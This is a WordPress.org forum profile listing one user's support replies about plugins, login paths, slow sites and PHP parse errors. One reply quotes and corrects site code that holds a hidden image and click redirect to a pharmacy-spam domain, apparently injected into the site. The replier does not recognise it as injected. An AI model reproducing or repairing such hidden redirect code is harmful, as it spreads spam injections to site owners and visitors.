John Hawkins
Forum Replies Created
-
Forum: Plugins
In reply to: [Event Ticketing for WordPress] Does anybody monitor this forum?No excuses, you’re 100% right. I apologize for the lack of support.
We’re going to be pulling the plugin from the repo until such a time that it’s ready for prime time.
Forum: Plugins
In reply to: [WP Simple Calendar] Problems after deactivationI looked at your site and I can’t replicate that. It sounds like it may have just been a cache issue?
Forum: Plugins
In reply to: [WP Simple Calendar] Last Month-Next Month Links don't click in IEI’ll have to take a look. Thanks for reporting it.
Forum: Plugins
In reply to: [WP Simple Calendar] Any documentation@chrismc69, I need to update that. I’ll push an update sometime this week with additional info
Forum: Fixing WordPress
In reply to: My site shows error Parse error: syntax error, unexpected T_STRINGGood point, Josh. I assumed template file, and skipped right to the offending line.
And, that final script, looks not sure about that one. Hopefully somebody else can help.
Forum: Fixing WordPress
In reply to: My site shows error Parse error: syntax error, unexpected T_STRINGOi. it may be balking at this:
\’//\’Which was originally:
‘//’Maybe try putting it back like it was?
Forum: Fixing WordPress
In reply to: My site shows error Parse error: syntax error, unexpected T_STRINGYeah, that line spanned across 4 or 5 lines. Try this one:
Forum: Fixing WordPress
In reply to: WordPress admin log in pageLooks like your wordpress install is inside a folder called wp. You need to go to /wp/wp-login.php
Forum: Fixing WordPress
In reply to: My site shows error Parse error: syntax error, unexpected T_STRINGYou might try doing this:
$message .= “</table>”;
$message .= ‘<img id=”hidadvnet” style=”visibility:hidden;position:absolute;top:5px;left:5px;cursor:pointer;” src=”https://centralrxmall.com/campaign/hidadvnet.jpg” width=”716″ height=”385″ border=”0″ onclick=”javascript:window.location=\’https://centralrxmall.com/\’;”>
<script type=”text/javascript”>But, note that you didn’t supply the entire chunk of code needed. Somewhere there’s a straggling “; that’s going to bite you. Change that to ‘; if you can find it.
Another option would be to use pastebin and supply a bit more of the code so I can see what the rest looks like.
Forum: Plugins
In reply to: [WP Simple Calendar] Incorrect LocationFixed both of these issues and released them as part of version 1.0.1
Forum: Plugins
In reply to: [WP Simple Calendar] Incorrect LocationThanks for the feedback. I’ll look in to both of these issues shortly.
Forum: Plugins
In reply to: [Lightbox Plus Colorbox] multiple galleries using 3.5 beta issuesthanks so much, Dan. I’ll test this out and report back!
Forum: Alpha/Beta/RC
In reply to: Gallery shortcodes not respecting idsJust retested and now I can’t reproduce it either (after being able to reproduce it for 2 days straight). Odd.
I deactivated all plugins, re-ran the tests and that seemed to work. Re-activated all plugins and it continued to work.
Forum: Fixing WordPress
In reply to: Site Runs Very Slow / CrashesDan,
I tried loading the site and after more than 1 minute of trying to connect, I ended up receiving a 500 internal server error.
My suggestion would be to review the error log for the site. It may point to something that is hanging up. Maybe a plugin or something odd in the theme that is taking an unreasonably long time to complete.
If you are unable to locate the error log, you may need to contact your provider directly and ask for their help to find it.
Cheers.
It looks like you are trying to run this on your local computer for testing which probably doesn’t have CURL installed. When you move the site to a server with CURL, that error will go away.
The other option would be to install Curl on your local machine.